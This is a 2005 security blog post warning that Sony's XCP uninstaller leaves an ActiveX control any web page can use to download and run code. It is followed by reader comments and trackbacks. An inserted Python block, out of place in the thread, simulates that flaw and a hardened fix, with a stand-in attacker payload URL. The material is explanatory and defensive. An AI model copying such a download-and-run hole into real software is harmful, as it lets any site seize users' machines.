Alex Halderman and I have confirmed that Sony's Web-based XCP uninstallation utility exposes users to serious security risk. Under at least some circumstances, running Sony's Web-based uninstaller opens a huge security hole on your computer. We have a working demonstration exploit.
We are working furiously to nail down the details and will report our results here as soon as we can. [UPDATE (Nov. 15): We have now posted more details.]
In the meantime, we recommend strongly against downloading or running Sony's Web-based XCP uninstaller.
Kudos to Muzzy for first suggesting that such a hole might exist.
UPDATE: If you're technically sophisticated, and you have run the XCP uninstaller on your computer, you may be able to help us in our investigations. It won't take long. Please contact Alex to volunteer. Thanks.

I'll try to summarize this in one word... "ouch". Eagerly waiting for more info. This is the equivalent of a soap opera, only for geeks. Gets more interesting as it develops. Somebody will get shot or stabbed very shortly.
Sorry for the second post.
I think that somebody who is going to be shot shortly will be First4Internet. As in many cases, Sony might not have been aware at all of the code and the danger it presents.
The provider, being First4Internet, assured them everything was fine and dandy and so Sony PR people simply repeated that to the public.
If it gets to court, I imagine First4Internet will get shafted every which way for liability and Sony will deny any wrongdoing and blame it all on First4Internet.
This is almost certainly true with respect to any copyright infringement claims Sony may face due to the rootkit. I would be very surprised if Sony did not have First4Internet indemnify them up the wazoo against claims that any code F4I developed for Sony was infringing.
Of course, everything will depend on the nature and form of complaints against Sony. If Sony gets hit with claims having to do with consumer protection and consumer fraud, it may be difficult to lay off the liability on F4I, since they presumably provided a product to Sony's specifications.
All just speculation at this point, but very very interesting.
I think that someone made a decision, without the proper technical background to determine if the technology was safe, and that now Sony is paying the price for it. This has really hit their reputation badly, and probably hurt sales.
And as for First4Internet, I would say that their viability as a company is in question, along with the programming skills of their staff.
I don't think we've heard the last of this - who else did First4Internet sell the technology to? What other plans does Sony have for DRM - especially in regards to the PlayStation 3? What about the anti-virus companies that supposedly advised First4Internet?
Man, this thing is a mess. Up till now I would have trusted Sony. Their release of a Linux adaptation for the PlayStation was a real coup. Now, I don't think I'd trust them as far as I could throw them (and a 50 year old man can't throw things very far).
This problem is not going away. I initially wasn't going to write about it since it seemed that it was subsiding. Then Sony came out with their half-assed statement that they would "temporarily" suspend manufacturing the malicious code, saying nothing about a recall, apology, etc. Worse were the steps that one had to go thru to get rid of the code. We wrote about it on Friday thinking that would be it. No such luck, as today there appear to be more stories than last week. This fire is building, and Sony is throwing gas, not water, on the fire.
All in all, this reminds me of Watergate, where the news kept getting worse and was compounded by their horrible attempts to mitigate the damage. I believe this is going to start impacting the Sony brand, and they will have no choice but to can Andrew Lack, the CEO, whom BMG has been trying to oust anyway.
[...] http://www.freedom-to-tinker.com/?p=926 Alex Halderman and I have confirmed that Sony’s Web-based XCP uninstallation utility exposes users to serious security risk. Under at least some circumstances, running Sony’s Web-based uninstaller opens a huge security hole on your computer. We have a working demonstration exploit. [...]
Being a musician, another unfortunate consequence of Sony's mistake is the damage it will do to the artists whose works are on the CDs. If record sales are being hurt, then careers are being hurt too. I hope Sony has the integrity to take care of the artists who were the subject of the rootkit fiasco. However, I don't think Sony has a good reputation at the moment where integrity is concerned.
For what it's worth, I was about to take delivery on my Sony Bravia $3800 TV; however, I'm quite happy with the new HD Samsung I'm watching Monday night football on now.
If Sony doesn't think it will have a universal negative impact on their business, they're crazy. This story is going well beyond the "geeks". (No offense to my fellow geeks.)
Alex: "If it gets to court, I imagine First4Internet will get shafted every which way for liability and Sony will deny any wrongdoing and blame it all on First4Internet."
IANAL, but I don't think this would work. I am pretty sure that as part of corporate due diligence Sony was supposed to have its experts look over the code from First4Internet. At the very least they should have checked into the general design and had a third party go through the code. It was really dumb of them to not do this. If you were working for Sony, wouldn't you have thought DRM code could cause security problems, and checked it out to guarantee it didn't?
[...] Also check Don’t use Sony’s Web-based XCP uninstaller, in Freedom to Tinker, as it exposes the user to serious security risks. [...]
You know somewhere at Sony a fellow geek who "gets it" is saying "I told you so, I freakin' told you so"
That's how it was at Intuit when the TurboTax DRM boot sector crap came out. We didn't know about the boot sector crap, that was all 3rd party, but we knew strong-armed DRM was a bad idea.
Wouldn't it be amusing if it turned out that First4Internet had sold the software to Sony under standard software licensing agreement terms, i.e. absolutely no liability for anything? I'm not sure that's likely, given that it was probably custom software developed under some sort of real (not clickwrap) contract, but it would be amusing if the "software license agreements can unilaterally claim the moon and stars and still be 100% enforceable" thing were to bite Sony.
[...] Freedom to Tinker » Blog Archive » Don’t Use Sony’s Web-based XCP Uninstaller [...]
I feel sorry for the folks who are trusting this program to do something helpful for them. At the same time, I hope that people will take this as a learning experience and come away with a better understanding of why software freedom (see http://www.gnu.org/philosophy/free-sw.html) is important, even for the non-technical computer user.
Someday, users will be encouraged to examine the underlying ethical questions that software proprietors don't want you to ask. The free software movement asks you to consider how should we treat other people when it comes to computer software. It's an interesting discussion, particularly now. Here's hoping that you'll join the discussion and choose to run more free software.
J. J. Nicholson-Owen: "I feel sorry for the folks who are trusting this program to do something helpful for them. At the same time, I hope that people will take this as a learning experience"
I wish *you* would take the responses to your former inept interventions as a learning experience and post something *relevant* to the discussion. But I'm not hopeful.
Urban terrorist: "who else did First4Internet sell the technology to?"
I don't know, Urban, but I found a listing of some of their clients:
"... it's certainly worth noting that Universal’s MCA unit, Warner Music Group, and EMI have all been customers of First4Internet, notwithstanding EMI’s claims of innocence."
http://www.boycottsony.us/?p=18
I think they undermined the power of blog media to their detriment. The sad fact for Music industry is that there is no fool-proof way to protect your music from being copied. All they can hope for is 80/20 rule, that most people will be decent enough to not copy or at least buy something else down the line.
Have you looked into these details from F4I?
Who else used this software? For distribution within the areas specified, they must have had more than Sony as their only client.
http://www.xcp-aurora.com/xcp1.aspx
How is XCP available?
XCP1 is now available through our CDR duplication partners in the UK and US. Record Labels also have the option to license the Aurora software programs and install their own multiple drive towers for mass burning in-house. Please contact us for more information about becoming a CDR duplication partner or for use of Aurora in-house.
London, UK
Santa Monica, CA, US
North Sydney, NSW, Australia
Germany
Osaka, Japan
Oxfordshire, UK
I think I'm posting some of the most relevant information here--run a free software OS and only free software on top of that. Someday a software proprietor won't let you turn off autorun. Someday a proprietary program with functionality you want will come with a backdoor, virus, or some other program you don't want. Then, assuming you learn about these problems before they adversely affect you, shallow reads on quick fixes (hold down this key as you put in the CD, change that registry setting, etc.) won't pass muster with the tech-heads and you'll be compelled to address the underlying problems at work. Hopefully you won't be left with a computer that obeys someone else's commands not yours. What's sad is that such educated and technically literate people have such a hard time seeing any ethical component to computing and reaching the conclusion that the practical benefits of software freedom (lower prices, higher security, ability to fully understand what a program does, etc.) don't come without the freedom.
[...] Sony is in trouble, and it is a blog that's dropped it in it. "Freedom to Tinker" alleges security flaws in Sony's anti-piracy software, XCP. Anyone who has installed it, and then uninstalled it, on their computer could be wide open to attack by hacking and viruses, says the blog. The story has now been picked up by the Washington Post. [...]
I've cancelled my pre-order for my PS3, and although I was looking with interest at Sony's consumer-level HD cameras I'm now going to look elsewhere; like a lot of people, although I've not been directly affected by this I find Sony's behaviour throughout this whole debacle to be reprehensible. I do feel like I'm somewhat pissing against the wind -- 99% of the non-technical people I've spoken to have no idea what I'm on about both in terms of Sony's doings and what a root-kit actually is -- but such is life.
As always, of course, the only people who've suffered are the law-abiding citizens; the XCP protected albums are all available on P2P networks and are free of crappy DRM, so it's almost as if Sony are trying to encourage people to seek an illicit source for their music. Oh, well...
Don’t like the Sony rootkit? Don’t run the installer!
Alex Halderman and I have confirmed that Sony’s Web-based XCP uninstallation utility exposes users to serious security risk. Under at least some circumstances, running Sony’s Web-based uninstaller opens a huge security hole on your compute...
Hey guys, I see you have been talking about the legal implications of Sony's little adventure. What about the INTERNATIONAL legal environment? Sony will be liable, both to CRIMINAL and CIVIL suits, all over the world. I4F is going to get it in the neck too.
Serves them right!
"J.B. Nicholson-Owens Says:
November 15th, 2005 at 2:02 am
I think I’m posting some of the most relevant information here–run a free software OS and only free software on top of that. "
Unfortunately that might not be an option for long. Here in Finland a project manager at IFPI (the group representing the phonographic industry) commented to a journalist that they don't see it as a problem if a CD cannot in the future be played on a Mac or Linux workstation at all, since those represent only a marginal number of all the computers.
So that's the attitude now folks.
For the iTunes music store... =)
[...] Edward Felton’s Freedom to Tinker blog entry entitled Don’t Use Sony’s Web-based XCP Uninstaller where he states: Alex Halderman and I have confirmed that Sony’s Web-based XCP uninstallation utility exposes users to serious security risk. Under at least some circumstances, running Sony’s Web-based uninstaller opens a huge security hole on your computer. We have a working demonstration exploit. [...]
[...] Source: Freedom to Tinker via Boing Boing Filed in: Announcements | No Comments » [...]
[...] There are some hints there about vulnerabilities with the uninstaller listed above, a link here gives the warning to not use Sony’s uninstaller. [...]
Sony Joins the Hacker Community
Schneier on Security:
Bruce Schneier was where I first heard about this at. It has since gotten much worse. I have purposely not posted on this until things have shaken out a bit.
1. First it is discovered that sony has been installing a rootkit ...
This doesn't look like something Sony can palm off on someone else "sneaking in code" or doing something its legal department wasn't aware of. The EULA reads exactly the same way.
[...] Boing Boing points to an article on Freedom to Tinker about the web-based uninstaller that Sony provides for their rootkit-infested XCP DRM software. Apparently the uninstaller potentially opens another exploitable backdoor in the OS. [...]
[...] Don’t Use Sony’s Web-based XCP Uninstaller [link] [...]
[...] More details about the exchange program will be posted on Sony-BMG’s website later this week. CDs with the rootkit can be identified by the text "?cp.sonybmg.com/xcp" on the reverse of the CD itself, or the text "cp.sonybmg.com/xcp" in the URL on the bottom or right side of the CD case. Those who have been infected by Sony’s malware should use caution when using Sony’s "patch." According to security researchers, the web-based install of Sony’s "patch" opens users up to an entirely different security risk, one that is even worse than the original rootkit. The consequences of the flaw are severe. It allows any web page you visit to download, install, and run any code it likes on your computer. Any web page can seize control of your computer; then it can do anything it likes. That’s about as serious as a security flaw can get. The root of the problem is a serious design flaw in Sony’s web-based uninstaller. When you first fill out Sony’s form to request a copy of the uninstaller, the request form downloads and installs a program – an ActiveX control created by the DRM vendor, First4Internet – called CodeSupport. CodeSupport remains on your system after you leave Sony’s site, and it is marked as safe for scripting, so any web page can ask CodeSupport to do things. One thing CodeSupport can be told to do is download and install code from an Internet site. Unfortunately, CodeSupport doesn’t verify that the downloaded code actually came from Sony or First4Internet. This means any web page can make CodeSupport download and install code from any URL without asking the user’s permission. [...]
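The design flaw the excerpt above describes (a control marked safe for scripting that fetches and runs code from any URL without checking where it came from) can be modelled beside the checks that would have closed it. The following is an added example, not code from Sony, First4Internet or this blog; the class names, the attacker host, the file paths under cp.sonybmg.com and the pinned hash are constructed, and execution of downloaded code is only simulated.

```python
import hashlib
from urllib.parse import urlparse

# Constructed stand-ins for files the control would fetch over HTTP.
# Only the hostname cp.sonybmg.com comes from the page; the paths and
# the attacker host are made up for this example.
FAKE_INTERNET = {
    "https://cp.sonybmg.com/xcp/uninstall.bin": b"uninstaller-bytes",
    "https://cp.sonybmg.com/xcp/tampered.bin": b"tampered-bytes",
    "http://evil.example/payload.bin": b"attacker-bytes",
}

# Checks the hardened version enforces (an assumed policy, not the vendor's).
ALLOWED_ORIGINS = {"https://cp.sonybmg.com"}
PINNED_SHA256 = hashlib.sha256(b"uninstaller-bytes").hexdigest()


def fetch(url):
    """Simulated download; returns empty bytes for unknown URLs."""
    return FAKE_INTERNET.get(url, b"")


class VulnerableCodeSupport:
    """Models the flaw: the control is marked safe for scripting, so any page
    can call it, and it never checks where the downloaded code came from."""

    def download_and_run(self, url, caller_origin):
        code = fetch(url)
        # The real control would install and execute here; we only record it.
        return {"executed": code, "caller": caller_origin}


class SiteLockedCodeSupport:
    """Same interface with the three missing checks: a site lock on the
    calling page, an origin check on the download URL, and a hash pin."""

    def download_and_run(self, url, caller_origin):
        # 1. Site lock: refuse scripting from pages outside the vendor's origin,
        #    which the ActiveX "safe for scripting" flag alone never does.
        if caller_origin not in ALLOWED_ORIGINS:
            raise PermissionError(f"caller origin not allowed: {caller_origin}")
        # 2. Fetch only over HTTPS from the vendor's own origin.
        parts = urlparse(url)
        origin = f"{parts.scheme}://{parts.netloc}"
        if parts.scheme != "https" or origin not in ALLOWED_ORIGINS:
            raise PermissionError(f"download origin not allowed: {origin}")
        code = fetch(url)
        # 3. Verify the payload against a hash pinned inside the control, so
        #    a swapped or tampered file is refused even from the right host.
        if hashlib.sha256(code).hexdigest() != PINNED_SHA256:
            raise ValueError("payload hash does not match pinned value")
        return {"executed": code, "caller": caller_origin}


def simulate(control, url, caller_origin):
    """Drive one scripted call; return 'executed' or the refusal reason."""
    try:
        control.download_and_run(url, caller_origin)
        return "executed"
    except (PermissionError, ValueError) as exc:
        return f"refused: {exc}"


if __name__ == "__main__":
    attack = ("http://evil.example/payload.bin", "http://evil.example")
    for control in (VulnerableCodeSupport(), SiteLockedCodeSupport()):
        print(type(control).__name__, "->", simulate(control, *attack))
```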
Sony's rootkit getting ever more famous
SonyBMG's malicious software (rootkit) is becoming ever more famous. The scandal is spreading ever wider, and new, ever juicier details are being revealed all the time. It is known that the rootkit not only hides the softw...
I also am appalled at the response of Sony and went thru the step of filling out the form to get some solution to the cluster F copy protection of SONY CD, but I did not install the uninstaller. I don't trust a company that acted unethically to provide a trustable fix. I will not buy any Sony CDs and have put all my Sony gear up for sale on Ebay. I am selling a SONY DV camcorder, SONY digital camera, Sony Minidisc, SONY Monitor, and SONY notebook. I will not buy SONY if this is how they treat customers. I ordered a HP Tablet PC and a Canon Camcorder and Apple IPOD 60 gig video and Dell LCD monitor. MY former loyalty to the SONY brand is DEAD.
Perhaps if more consumers voted with their dollars they might get the message.
Eduardo: "IANAL, but I don’t think this would work. I am pretty sure that as part of corporate due diligence Sony was supposed to have its experts look over the code from First4Internet. At the very least they should have checked into the general design and had a third party go through the code. It was really dumb of them to not do this. If you were working for Sony, wouldn’t you have thought DRM code could cause security problems, and checked it out to guarantee it didn’t?"
You'd think so, but no... I had the pleasure to work for a tiny agency who was writing some code for one of the big 3 PC sellers... I'll give you a hint, it's not Dell or IBM. Anyway, being the sole developer on some of the smaller projects, nobody ever asked me for the source code.
Big Corporation asks a Tiny Agency who has a genius sales person Bob who promised to deliver anything Big Corporation desires and then some more. When the final product is done and ready, big shot Bill at the Big Corporation looks it over, gives a nod and off it goes.
I imagine the process is the same in most companies where "financial liability" is not part of the business.
I guess you are safer using peer to peer file sharing, than legally purchasing a Sony/BMI CD.
Wow, I just called Sony's 800 number and got through immediately. My name isn't really John Smith, but I gave them that name when they asked. It's just a service (the gal 'operator 21' told me so herself), but I'm surprised that there was no hold time. I think more people need to call that number so Sony can't say that they haven't heard (m)any complaints.
My 2 cents (American, 1.2 cents Canadian ;) )
[...] Nice bedtime story so far. Now it turns out that Sony?s web-based XCP (rootkit) uninstaller seems to open huge, gaping security holes itself… [...]
How do you determine if XCP is installed?
[...] On this week's show we look at the national attention for the free culture movement. Sean fails to score with Rosario Dawson. Fred checks out the Machinima festival in Queens. Plus there is more fallout for Sony's DRM. We also ask you for commercials (iwasthere(at)fredbenenson.com). Fred compares his old music project with a Trading Spouses remix. In music news Fred shoots hipster rockers The Harlem Shakes. The unhip Bare Naked Ladies release their new album on a hip memorystick format. Then we try to watch video on an iPod Nano. And Sean cannot understand music blog aggregators. On the celebrity front Fred brings us more scientology news, Ali G gets threatened, and of course Christian Slater and Jeremy Piven news. Also we bash blogger Ultragrrrrl and starlet Lindsay Lohan. In comedy news, Arrested Development gets canceled, House of Cosby is back from the dead, and Saturday Night Live has some publishing controversy. From the art world Fred revisits a fabled Connecticut museum and a new meaning for public domain. On the tech beat, we don't care about the XBox360, some cool video casting, cellphones continue to drive us nuts, the mythical aluminum foil helmet, and the debut of google base. Then we see what's more like drugs - DVDs or Video Games. Then we go back in time for the announcement of the iPod. We come back to the future to check out the eff joining forces with gawker. And we marvel at the 100 dollar laptop and a DIY iPod Stone dock. In New York news a gate floats around the city, a film on NYU suicide, plans for 2 Columbus Circle, an NYC bike crackdown, Google buys a huge loft, and sublet advice. We also speculate on the Astor place cube. Also the mayor is made of humus. Finally we check out Peter Braunstein news. He's everywhere in New York City even on the subway. His dad thinks he did it. Apparently he was married. All this and more on "I Was There..." [...]
[...] Bruce Schneier has an excellent piece on the Sony rootkit. If you haven’t heard about this, I suggest starting with these two links and keep reading. This story gets weirder by the minute, but it is quite entertaining. The disturbing part is that the uninstaller is a case where the cure is worse than the disease - opening up a massive security hole in your system. [...]
Does anyone have a list of companies that use the First4Internet software?
Boycott them all, for your own protection!
We need to get a listing of all the clients of F4I and when they started using this code.
That could be the first course of action to finding a "cure" for this...Ghastly Mistake.
Anyone got one?
[...] Today, following up on this possibility, Ed Felten and Alex Halderman announced that they have confirmed that Sony’s Web-based XCP uninstallation utility exposes users to serious security risk. Under at least some circumstances, running Sony’s Web-based uninstaller opens a huge security hole on your computer. We have a working demonstration exploit. [...]
[...] Latest news is that the cure is worse than the disease: http://www.freedom-to-tinker.com/?p=926 I find following the developments in this case pretty interesting. I think that artists should have the right to protect their material, but I feel that most of the "solutions" that the big companies have tried to implement are draconian, fascist and show an incredible disrespect for their consumers, and this incident is a perfect example. [...]
[...] In an attempt to salvage the situation, Sony recently released instructions and an uninstaller for this piece of software. Seems like good news, no? It would be except Sony’s uninstaller actually exposes users to serious security risk. Fantastic. [...]